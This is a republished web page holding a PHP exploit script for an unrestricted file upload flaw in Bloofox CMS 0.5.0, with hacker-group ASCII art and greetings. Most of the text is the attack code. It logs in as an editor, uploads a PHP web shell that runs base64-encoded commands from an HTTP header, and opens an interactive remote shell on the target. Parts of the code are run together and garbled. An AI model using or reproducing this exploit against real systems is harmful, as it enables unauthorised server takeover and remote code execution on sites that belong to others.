facebook facebook twitter rss

Bloofox CMS Unrestricted File Upload Exploit

Author: f4ry4r_red , Published: 16-09-2013

<?php

  
/*
  

 
 
                             #D:: ___    ____    ____
                            #````______/```\__//```\__/____\
                            #``_/```\_/``:```````````//____\
                            #`/|``````:``:``..``````/ f4ry4r_red \  
                            #|`|`````::`````::``````\````````/
                            #|`|`````:|`````||`````\`\______/
                            #|`|`````||`````||``````|\``/``|
                            #`\|`````||`````||``````|```/`|`\    
                            #``|`````||`````||``````|``/`/_\`\
                            #``|`___`||`___`||``````|`/``/````\
                            #```\_-_/``\_-_/`|`____`|/__/``````\
                            #````````````````_\_--_/````\`````/  
                            #```````````````/____```````````/
                            #``````````````/`````\`````````/
                            #``````````````\______\_______/

# f4ry4r_red W4s H3r3...!
 Exploit Title   : Bloofox CMS Unrestricted File Upload Exploit
 Date            : 17 June 2013
 Exploit Author  : HackFans
 Site            : hackfans.org
 Vendor Homepage : http://forums.hackfans.org/
 Software Link   : http://jaist.dl.sourceforge.net/project/bloofox/bloofoxCMS/bloofoxCMS_0.5.0.7z
 Version         : 0.5.0
 Tested on       : Window and Linux
   
   
#####################################################
VULNERABILITY: Unrestricted File Upload 
#####################################################
   
 This application has an upload feature that allows an authenticated user
with Administrator roles or Editor roles to upload arbitrary files to media
directory cause remote code execution by simply request it.
 
  
#####################################################
EXPLOIT
#####################################################
   
*/
  
error_reporting(0);
set_time_limit(0);
ini_set("default_socket_timeout"5);
  
function 
http_send($host$packet)
{
    if (!(
$sock fsockopen($host80)))
        die(
"\n[-] No response from {$host}:80\n");
   
    
fputs($sock$packet);
    return 
stream_get_contents($sock);
}
 
 
   
if (
$argc 3)
{
print 
"\n==============================================\n";
print 
"  Bloofox CMS Unrestricted File Upload Exploit  \n";
print 
"                                              \n";
print 
"        Discovered By hackfans.org         \n";
print 
"==============================================\n\n";
print 
"                      #D:: ___    ____    ____
print "                      
#````______/```\__//```\__/____\ \n"; 
print "                      #``_/```\_/``:```````````//____\ \n";
print 
"                      #`/|``````:``:``..``````/ f4ry4r_red \ \n";   
print 
"                      #|`|`````::`````::``````\````````/ \n";
print 
"                      #|`|`````:|`````||`````\`\______/ \n";
print 
"                      #|`|`````||`````||``````|\``/``| \n";
print 
"                      #`\|`````||`````||``````|```/`|`\ \n";    
print 
"                      #``|`````||`````||``````|``/`/_\`\ \n";
print 
"                      #``|`___`||`___`||``````|`/``/````\ \n";
print 
"                      #```\_-_/``\_-_/`|`____`|/__/``````\ \n";
print 
"                      #````````````````_\_--_/````\`````/ \n";   
print 
"                      #```````````````/____```````````/ \n";
print 
"                      #``````````````/`````\`````````/ \n";
print 
"                      #``````````````\______\_______/ \n";

print 
"\nUsage......: php $argv[0] <host> <path> <user> <password>\n";
print 
"\nExample....: php $argv[0] target /bloofoxcms/ editor editor\n";
    die();
}
  
$host $argv[1];
$path $argv[2];
 
$payload "username={$argv[3]}&password={$argv[4]}&action=login";
 
$packet  "POST {$path}admin/index.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$host}{$path}admin/index.php\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: application/x-www-form-urlencoded\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
 
$response http_send($host$packet);
 
if (!
preg_match("/Location: index.php/i"$response)) die("\n[-] Login failed!\n");
if (!
preg_match("/Set-Cookie: ([^;]*);/i"$response$sid)) die("\n[-] Session ID not found!\n");
 
print 
"\n..:: Login Successful ::..\n";
print 
"\n..::   Waiting hell   ::..\n\n";
 
$payload  "--o0oOo0o\r\n";
$payload .= "Content-Disposition: form-data; name=\"filename\"; filename=\"sh.php\"\r\n";
$payload .= "Content-Type: application/octet-stream\r\n\r\n";
$payload .= "<?php error_reporting(0); print(___); passthru(base64_decode(\$_SERVER[HTTP_CMD]));\r\n";
$payload .= "--o0oOo0o--\r\n";
 
$packet  "POST {$path}admin/index.php?mode=content&page=media&action=new HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Referer: {$host}{$path}admin/index.php?mode=content&page=media&action=new\r\n";
$packet .= "Cookie: {$sid[1]}\r\n";
$packet .= "Content-Length: ".strlen($payload)."\r\n";
$packet .= "Content-Type: multipart/form-data; boundary=o0oOo0o\r\n";
$packet .= "Connection: close\r\n\r\n{$payload}";
      
http_send($host$packet);
  
$packet  "GET {$path}media/files/sh.php HTTP/1.0\r\n";
$packet .= "Host: {$host}\r\n";
$packet .= "Cmd: %s\r\n";
$packet .= "Connection: close\r\n\r\n";
      
while(
1)
{
    print 
"\nBloofox-shell# ";
    if ((
$cmd trim(fgets(STDIN))) == "exit") break;
    
$response http_send($hostsprintf($packetbase64_encode($cmd)));
    
preg_match('/___(.*)/s'$response$m) ? print $m[1] : die("\n[-] Exploit failed!\n");
}
  
?>


################################################################################################################
Greetz : BlackErroR, X3NON ,Saman.gunner,HaCkeD,m3h2lad,Crack3R, ALI_TNP Crall of member In hackfans
################################################################################################################

Like us on Facebook :